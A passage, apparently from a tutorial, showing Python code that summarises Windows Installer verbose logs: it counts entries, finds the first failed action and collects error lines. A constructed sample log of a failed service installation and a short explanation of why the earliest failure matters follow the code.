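              if e["kind"] == "action_end" and RETURN_VALUES.get(e["rv"]) == "failed"]
    return {
        "msi_entries": len(msi),
        "client_entries": sum(e["ctx"] == "c" for e in msi),
        "server_entries": sum(e["ctx"] == "s" for e in msi),
        "first_failed_action": failed[0]["action"] if failed else None,
        "errors": [e["msg"] for e in msi if re.search(r"-- Error \d+\.", e["msg"])],
        "installation_failed": any(e["msg"].endswith("-- Installation failed.") for e in msi),
        "cleanup_seen": any(e["msg"].startswith("Cleaning up uninstalled install packages")
                            for e in msi),
    }


# Constructed log; shaped like msiexec verbose output, not a real AppGuard log.
SAMPLE_LOG = r"""=== Verbose logging started: 7/23/2010  18:46:01  Build type: SHIP UNICODE 5.00.7600.00  Calling process: C:\setup\AppGuard6432Setup.exe ===
MSI (c) (00:30) [18:46:03:578]: Cleaning up uninstalled install packages, if any exist
MSI (s) (A4:D8) [18:46:10:120]: Executing op: ActionStart(Name=InstallFiles,...)
Action start 18:46:10: InstallFiles.
Action ended 18:46:12: InstallFiles. Return value 1.
Action start 18:46:12: InstallServices.
MSI (s) (A4:D8) [18:46:13:001]: Product: AppGuard -- Error 1923. Service 'Example Service' (ExampleSvc) could not be installed. Verify that you have sufficient privileges to install system services.
Action ended 18:46:13: InstallServices. Return value 3.
Action ended 18:46:14: INSTALL. Return value 3.
MSI (s) (A4:D8) [18:46:14:500]: Product: AppGuard -- Installation failed.
=== Logging stopped: 7/23/2010  18:46:15 ===
"""

if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

    The first failed action is the useful datum: the `Return value 3` on the top-level `INSTALL` action only restates what the earlier one already said, which is why the summary reports the earliest.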